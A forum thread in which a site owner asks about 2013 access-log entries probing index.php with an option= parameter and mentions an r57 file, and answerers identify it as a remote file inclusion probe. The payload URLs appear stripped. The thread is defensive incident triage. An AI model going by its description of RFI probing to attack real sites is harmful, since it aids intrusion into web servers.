Suspicious Network Protocol Activity

Hi, I found the following lines in the access logs for two of my sites... - - [15/Oct/2013:00:47:08 +0800] "GET /index.php?option= HTTP/1.1" 200 31476 "-" "Mozilla/3.0 (compatible; Indy Library)" - - [15/Oct/2013:02:27:35 +0800] "GET /index.php?option= HTTP/1.1" 404 1404 "-" "Mozilla/3.0 (compatible; Indy Library)" - - [15/Oct/2013:03:02:14 +0800] "GET /index.php?option= HTTP/1.1" 404 1404 "-" "Mozilla/3.0 (compatible; Indy Library)"

What is the attacker trying to do? Are they trying to upload the r57 file to my server? I searched for it but it's not there.
Who is Participating?
Zephyr ICTConnect With a Mentor Cloud ArchitectCommented:
I think it was someone looking for something like this:

Since I only see GET commands we can assume they were not uploading something.
killdurstAuthor Commented:
Assuming that the r57.txt at used by the attacker is identical to the one at "", what kind of response did the attacker get when he executed the following URL?

I executed the following command in my browser and the homepage uploaded correctly.

Note that "" is fictional in this case.
Zephyr ICTCloud ArchitectCommented:
I'm not sure what it does exactly, usually the option= is used for views I think ...

You could test it in a secured environment (e.g Virtual Machine), I would do it, but I'm at work and don't have access to one.

It could just download the file or it might just give an error 404 page not found.

In your test it just went to the front page because it couldn't find the option probably?

Maybe some other expert can give more insight in the web part?

Did you use the website tips to search for the files on your server? I know you already searched for it and couldn't find anything, just making sure.
Dave HoweConnect With a Mentor Software and Hardware EngineerCommented:
What they are trying to do is test for a relay vulnerability in your index.php - specifically, that it will download a file from the ftp site specified in the option argument.  Assuming this isn't the case, you can safely ignore as the sort of Internet background scanning that goes on all the time - but DO check that is the case first though :)
Zephyr ICTCloud ArchitectCommented:
What they are trying to do is test for a relay vulnerability in your index.php

That's what I figured as well ... But wasn't sure, thanks for clarifying.
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

All Courses

From novice to tech pro — start learning today.